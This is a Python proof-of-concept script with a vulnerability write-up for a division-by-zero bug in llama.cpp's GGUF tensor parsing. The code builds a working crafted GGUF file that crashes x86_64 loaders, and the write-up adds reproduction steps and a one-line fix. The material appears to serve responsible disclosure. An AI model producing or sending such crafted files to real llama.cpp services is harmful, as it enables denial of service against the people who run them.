| |
| """ |
| PoC: llama.cpp GGUF Division-by-Zero (UB / SIGFPE) via crafted tensor dimensions |
| ================================================================================== |
| |
| Vulnerability: Division by zero in gguf.cpp tensor dimension overflow check. |
| |
| Location: llama.cpp/ggml/src/gguf.cpp, lines 632-634 |
| |
| Root Cause: |
| Line 623 validates tensor dimensions with: |
| if (info.t.ne[j] < 0) |
| This rejects negative values but allows ne[j] == 0. |
| |
| Lines 632-634 then perform: |
| INT64_MAX/info.t.ne[1] |
| INT64_MAX/info.t.ne[2] |
| INT64_MAX/info.t.ne[3] |
| without checking for zero. When any of ne[1], ne[2], or ne[3] is zero |
| (for a tensor with n_dims >= 2), this triggers undefined behavior via |
| integer division by zero. |
| |
| Impact: |
| Any application using llama.cpp that loads a user-supplied GGUF file |
| (e.g., llama-cli, llama-server, any third-party app using gguf_init_from_file) |
| invokes undefined behavior. The concrete effect depends on the platform: |
| |
| - x86/x86_64: Integer division by zero raises SIGFPE, crashing the process. |
| This is the most common deployment platform for llama.cpp servers. |
| - aarch64/ARM: The SDIV instruction returns 0 for division by zero (no trap). |
| The UB is silently "swallowed" but the behavior is still formally undefined |
| per the C/C++ standard, and compilers may exploit the UB for optimization |
| (e.g., eliminating the entire check, leading to further downstream issues). |
| |
| On x86_64, this is a reliable denial-of-service: any llama.cpp-based service |
| that accepts user-uploaded GGUF model files can be crashed with a single |
| 128-byte malicious file. |
| |
| CVSS: Medium (denial of service via crafted input file) |
| |
| Affected code (gguf.cpp lines 622-641): |
| |
| // check that all ne are non-negative |
| if (info.t.ne[j] < 0) { // BUG: allows ne[j] == 0 |
| ... |
| } |
| |
| // check that the total number of elements is representable |
| if (ok && ((INT64_MAX/info.t.ne[1] <= info.t.ne[0]) || // divides by ne[1] |
| (INT64_MAX/info.t.ne[2] <= ...) || // divides by ne[2] |
| (INT64_MAX/info.t.ne[3] <= ...))) { // divides by ne[3] |
| ... |
| } |
| |
| Suggested Fix (one-line change at line 623): |
| |
| The cleanest fix is to reject zero-valued dimensions, since a tensor with |
| zero elements in any dimension is degenerate/invalid: |
| |
| // change line 623 from < to <= |
| - if (info.t.ne[j] < 0) { |
| + if (info.t.ne[j] <= 0) { |
| |
| This rejects zero-element dimensions entirely, preventing the division by |
| zero and also preventing degenerate tensors from entering the system. |
| |
| Alternatively, guard the division directly: |
| - if (ok && ((INT64_MAX/info.t.ne[1] <= info.t.ne[0]) || |
| + if (ok && info.t.ne[1] != 0 && info.t.ne[2] != 0 && info.t.ne[3] != 0 && |
| + ((INT64_MAX/info.t.ne[1] <= info.t.ne[0]) || |
| """ |
|
|
| import struct |
| import sys |
| import os |
|
|
|
|
| def build_gguf_string(s: str) -> bytes: |
| """Encode a string in GGUF format: uint64 length + raw bytes (no null terminator).""" |
| encoded = s.encode("utf-8") |
| return struct.pack("<Q", len(encoded)) + encoded |
|
|
|
|
| def build_malicious_gguf() -> bytes: |
| """ |
| Build a minimal GGUF v3 file with one tensor whose ne[1] = 0, |
| triggering division by zero at the overflow check in gguf.cpp. |
| |
| GGUF binary layout (little-endian): |
| 1. Magic: "GGUF" (4 bytes, ASCII) |
| 2. Version: uint32 (= 3) |
| 3. n_tensors: int64 (number of tensor info entries) |
| 4. n_kv: int64 (number of key-value metadata pairs) |
| 5. Key-value pairs (repeated n_kv times) -- we use 0 |
| 6. Tensor info entries (repeated n_tensors times): |
| a. name: gguf_string (uint64 length + UTF-8 bytes) |
| b. n_dims: uint32 (number of dimensions, max GGML_MAX_DIMS=4) |
| c. ne[0..n_dims-1]: int64 each (elements per dimension) |
| NOTE: dimensions [n_dims..3] are implicitly set to 1 |
| d. type: uint32 (ggml_type enum value) |
| e. offset: uint64 (byte offset into tensor data section) |
| 7. Padding to alignment boundary (default GGUF_DEFAULT_ALIGNMENT=32) |
| 8. Tensor data section |
| """ |
| buf = bytearray() |
|
|
| |
|
|
| |
| buf += b"GGUF" |
|
|
| |
| |
| buf += struct.pack("<I", 3) |
|
|
| |
| buf += struct.pack("<q", 1) |
|
|
| |
| buf += struct.pack("<q", 0) |
|
|
| |
|
|
| |
| buf += build_gguf_string("evil_tensor") |
|
|
| |
| |
| |
| buf += struct.pack("<I", 2) |
|
|
| |
| |
| |
| buf += struct.pack("<q", 1) |
|
|
| |
| |
| |
| |
| |
| buf += struct.pack("<q", 0) |
|
|
| |
|
|
| |
| |
| buf += struct.pack("<I", 0) |
|
|
| |
| buf += struct.pack("<Q", 0) |
|
|
| |
| |
| header_size = len(buf) |
| alignment = 32 |
| padding_needed = (alignment - (header_size % alignment)) % alignment |
| buf += b"\x00" * padding_needed |
|
|
| |
| |
| |
| |
| buf += b"\x00" * alignment |
|
|
| return bytes(buf) |
|
|
|
|
| def main(): |
| output_filename = "malicious_div_zero.gguf" |
|
|
| |
| if len(sys.argv) > 1: |
| output_filename = sys.argv[1] |
|
|
| data = build_malicious_gguf() |
|
|
| with open(output_filename, "wb") as f: |
| f.write(data) |
|
|
| file_size = os.path.getsize(output_filename) |
| print(f"[+] Wrote malicious GGUF file: {output_filename} ({file_size} bytes)") |
| print() |
| print("=" * 70) |
| print("VULNERABILITY: Integer Division by Zero (UB) in GGUF Tensor Parsing") |
| print("=" * 70) |
| print() |
| print("File: ggml/src/gguf.cpp, lines 632-634") |
| print("Bug: Division by ne[1] (= 0) in overflow check") |
| print("Trigger: Tensor with n_dims=2, ne[0]=1, ne[1]=0") |
| print("Type: CWE-369 (Divide By Zero)") |
| print() |
| print("--- How to Reproduce ---") |
| print() |
| print("1. Build llama.cpp (on x86_64 for guaranteed SIGFPE crash):") |
| print() |
| print(" git clone https://github.com/ggerganov/llama.cpp") |
| print(" cd llama.cpp") |
| print(" cmake -B build -DCMAKE_BUILD_TYPE=Release") |
| print(" cmake --build build -j$(nproc)") |
| print() |
| print("2. Run with the malicious file:") |
| print() |
| print(f" ./build/bin/llama-cli -m {output_filename}") |
| print() |
| print(" Or any program that calls gguf_init_from_file().") |
| print() |
| print("3. Expected result (x86_64):") |
| print() |
| print(" The process is killed by SIGFPE (signal 8) due to integer") |
| print(" division by zero in the tensor element count overflow check.") |
| print(" The crash occurs during GGUF header parsing, before any model") |
| print(" weights are loaded.") |
| print() |
| print(" NOTE: On aarch64/ARM, the hardware does not trap on integer") |
| print(" division by zero (SDIV returns 0). The behavior is still") |
| print(" undefined per the C/C++ standard and the compiler may exploit") |
| print(" the UB in unpredictable ways, but a hardware crash will not") |
| print(" occur. The primary impact is on x86_64 deployments.") |
| print() |
| print("--- Suggested Fix (one-line change) ---") |
| print() |
| print("In ggml/src/gguf.cpp, line 623, change the validation from") |
| print("strictly-less-than to less-than-or-equal:") |
| print() |
| print(" - if (info.t.ne[j] < 0) {") |
| print(" + if (info.t.ne[j] <= 0) {") |
| print() |
| print("This rejects zero-valued dimensions at the validation stage,") |
| print("before they can reach the division. A tensor with zero elements") |
| print("in any dimension is degenerate and should be rejected anyway.") |
|
|
|
|
| if __name__ == "__main__": |
| main() |
|
|